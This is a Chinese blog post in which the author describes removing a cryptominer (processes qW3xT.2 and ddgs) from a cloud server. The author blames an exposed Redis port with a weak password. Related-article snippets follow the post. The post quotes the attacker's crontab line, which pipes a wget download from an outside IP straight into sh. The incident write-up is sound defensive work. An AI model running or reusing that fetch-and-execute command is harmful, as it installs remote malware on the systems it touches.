记一次服务器被挖矿程序攻击解决

最新推荐文章于 2024-06-03 15:38:24 发布
最新推荐文章于 2024-06-03 15:38:24 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: Linux 运维 文章标签: 挖矿
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014209205/article/details/81632770
版权

这两天先后收到阿里云的两条短信,一次提示有挖矿程序;一次提示服务器上的crontab被改了。中间隔了1天。刚开始我还没有引起注意,看到有挖矿程序的时候,用top查看到有mined的进程,就直接kill掉了,后来又遇到的时候,发现不对啊,有两个特别占cpu的进程,分别是qW3xT.2和ddgs.3013。确定是挖矿进程无疑了。

 

1.使用top查看占用cpu高的进程,发现qW3xT.2占用将近200%,然后kill掉

 

2.kill 之后,发现过一会又起来,执行crontab -e

发现有一个定时操作,/15 * wget -q -O- http://149.56.106.215:8000//i.sh | sh

每15秒执行一次。这个就是对应了第二条短信,crontab被修改了。这里进行删除

 

3.在/tmp目录下,查看到有两个文件,一个是ddgs.2013和qW3xT.2。删除这两个文件

这一次出现这个问题的原因是:redis端口6379暴露在外了,谁都可以连接;另一个原因是6379设置的密码过于简单。

石硕页
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务器挖矿木马攻击该怎么处理
weixin_34101784的博客
02-12 535
2019独角兽企业重金招聘Python工程师标准>>> ...
服务器挖矿程序攻击解决办法
LuckyCurve的博客
02-27 1887
平平常常的一天,晚上在弄虚拟机的时候接收到了阿里云的云盾发来的消息,挖矿程序 以前从来没有碰到过这种事情,突然一下子有点懵了,也是对CentOS的操作指令不太熟悉,录下处理过程,供参考 输入top指令,查看CPU的占用情况,一个名为kdevtmpfsi的进程CPU占用率99%!比我的nginx和tomcat服务器占用的CPU还高… 果断一顿骚操作,通过top指令获取到了pid,直接kill -...
服务器遭遇挖矿怎么办?
最新发布
2401_84466316的博客
06-03 1071
我们先来了解下虚拟货币,以比特币为例,比特币是一种由开源的P2P软件产生的网络虚拟货币,它不依靠特定货币机构发行,通过特定算法的大量计算产生,比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并录所有的交易行为。矿工需要为比特币网络提供的算法来换取比特币,每一个比特币的节点都会收集所有尚未确认的交易,并将其归集到一个数据块中,矿工节点会附加一个随机调整数,并计算前一个数据块的SHA-256散列运算值。
一次阿里云服务器挖矿程序攻击及处理
Crayon
11-26 1372
top命令发现该挖矿程序占用了200%CPU kill掉程序发现第二天仍然会生成该程序,crontab -l 发现存在该定时任务 crontab -e 命令编辑定时任务,删除该定时任务
网站服务器挖矿木马攻击,hosts文件、crontab定时任务被锁定解决办法
ljk15036029526的博客
06-05 656
登录服务器发现异常,hosts文件被清空锁定无法修改和crontab -l内容被清空后添加了一个定时任务,无法删除和修改(删除后马上自动恢复回来)。判断可能是黑客利用redis漏洞攻击服务器,修改redis默认端口,配置redis复杂密码;判断为文件被加了隐藏权限,使用 lsattr 查看文件隐藏权限(文件被添加了 i a权限)找到运行的木马程序,删除木马程序目录。最好给服务器配置新的密钥文件。
服务器挖矿病毒怎么解决
m0_70754056的博客
07-14 1720
挖矿病毒是指通过利用计算机的计算资源进行加密货币挖掘的恶意软件。它能够隐藏在云服务器中,从而利用服务器的计算资源来进行挖矿。这样的病毒不仅会损害您的服务器,而且还会缩短其使用寿命和性能。今天,我们将向您介绍如何彻底清除云服务器上的挖矿病毒。
一次 Linux 被入侵,服务器变“矿机”全过程.docx
12-25
一次 Linux 被入侵,服务器变“矿机”全过程
解决sql2000安装程序配置服务器失败
12-09
解决sql2000安装程序配置服务器失败
线上服务器突然崩了!?Jenkins 服务器中挖坑病毒解决方案
01-09
作者:一盏烛光,贤牛特邀工程师。 防伪码:三十功名尘与土,八千里路云和月。 公元 2020/04/16 4:38 分,登录线上服务器,执行 top 命令执行,发现已经崩了… 我们的 Jenkins 数据是从广州研发部 copy 过来的,...
《OPCDA服务器与客户程序开发指南》修订版
06-30
《OPC DA服务器与客户程序开发指南》是一本专注于工业自动化领域的技术图书,主要针对OPC Data Access(OPC DA)技术进行深入讲解。OPC DA是OPC标准的一个核心部分,它为设备和应用程序之间的数据交换提供了一个统一...
一次服务器挖矿程序占用的解决过程
dabao87的博客
07-31 1万+
公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图) 这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是中了挖矿的马。(啊,我的天。这只是一个单核1G内存的阿里云主机)既然被***了,那就得干掉它,下面是解决过程: 1:第一步要先找到这个wnTKYg文件实体,对了还有一个叫ddg.2020的进程。 ...
服务器被种植挖矿程序,恶意访问ip等等。
Prodigal
07-01 1128
阿里云服务器安全中心的警告。 根据信息, 删除一些文件后。发现过一段时间又出现了。 top查看可以看到又两个程序占用资源很高。 一个是sysupdate,一个是networkservice. 这两个都在etc下。 下面图中的ip就是下载源。 在etc/update.sh中也有相同的地址。 解决方式 在/etc/下找到下面的文件,rm -rf 删除下面的文件。 如果出现提示无法删除。则使用chattr -i 文件名取消限制,然后再删除。 在/usr/bin/下找到以下文件,然后删除下面的文件。
张大哥笔服务器挖矿木马程序,该如何处理?
qq1369153265的博客
04-29 724
挖矿是跟区块链以及虚拟币有关系,虚拟币是挖矿挖出来的,每间隔一段时间,比特币或者以太坊虚拟币就会在他们的区块链系统上生成一个块的随机代码,网络上的所有服务器都可以去找这个随机代码,也就是挖矿的过程对这个随机代码进行挖掘,谁挖到这个代码就会产生一个区块链的块,那么比特币跟以太坊就会奖励找到随机代码的人,奖励一定数量的虚拟币,那么挖矿的人就会有动力去挖矿,去维护整个区块链节点的网络正常运行,挖矿需要计算哈希值需要服务器的处理能力,所以有些攻击者利用入侵别人服务器来给自己挖矿获取利润。
服务器提示有挖矿程序,是怎么回事
weixin_42341543的博客
03-25 1948
在提示我有挖矿程序后,我去阿里云的安全中心,看到有三个病毒进程警告,但是都结束进程失败,然后我询问售后工程师,售后工程师给我的回复时格式化云盘。因为没有找到更好的解决方式,就选择了重新安装系统和格式化云盘,已彻底清除病毒。 另外,如果没有主动进行挖矿程序,可能是因为安装的某些程序引起的。比如:安装redis时没有设置密码,或者使用默认端口都有可能引起病毒入侵。所以在安装redis时,不要使用默认端口6379,并且设置较为复杂的密码。 ...
在阿里云里面服务器怎么样可以更好的链接数据库
m0_64068722的博客
11-26 609
环境:阿里云ubuntu服务器 阿里云RDS数据库 问题:如何在阿里云服务器的终端使用shell命令连接RDS云数据库 解决方法: 1.阿里云服务器安装MySQL sudo apt-get install mysql-server 如果出现unable to locate package mysql-server 先使用语句 sudo apt-get update 2.连接阿里云数据库 在阿里云服务器终端 mysql -u root -h RDS数据库连接地址 -p 按提示输入密..
linux 环境下进程被 killed掉原因分析和解决方法
Ch3nnn的博客
03-06 1万+
运行自己写的程序,程序运行一段时间被killed,还以为是同事误操作执行了kill命令, 但是通知了同事注意下, 还是出现了程序被killed 需要分析原因并找到解决方法. 首先可能原因是 (1)内存不够 (2)程序出错 1.内存不够 方法1是查看linux 系统日志. vi /var/log/messages 如果出现 kernel: Out of memory: Kill pro...
阿里云服务器挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
一次服务器被植入挖矿木马cpu飙升200%解决过程
weixin_33736048的博客
03-29 1072
2019独角兽企业重金招聘Python工程师标准>>> ...
服务器上找到挖矿程序
05-17
如果你怀疑服务器上存在挖矿程序,可以采取以下步骤: 1. 检查进程:使用命令行工具查看当前正在运行的进程,查看是否有任何异常进程或者CPU占用率特别高的进程。 2. 检查网络连接:查看服务器是否与外部的矿池或者挖矿程序有网络连接。可以使用网络监控工具或者流量分析工具查看网络连接。 3. 检查文件:检查服务器中的文件,查看是否存在挖矿程序相关的文件。可以使用杀毒软件或者安全检测工具进行扫描。 4. 更新安全补丁:确保服务器上的操作系统和软件都是最新的版本,并且已经安装了最新的安全补丁。 如果你确认服务器上存在挖矿程序,建议立即停止该程序并采取进一步的安全措施,例如增加防火墙规则、更新密码等。同时建议联系专业安全团队进行深度检测和排查。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值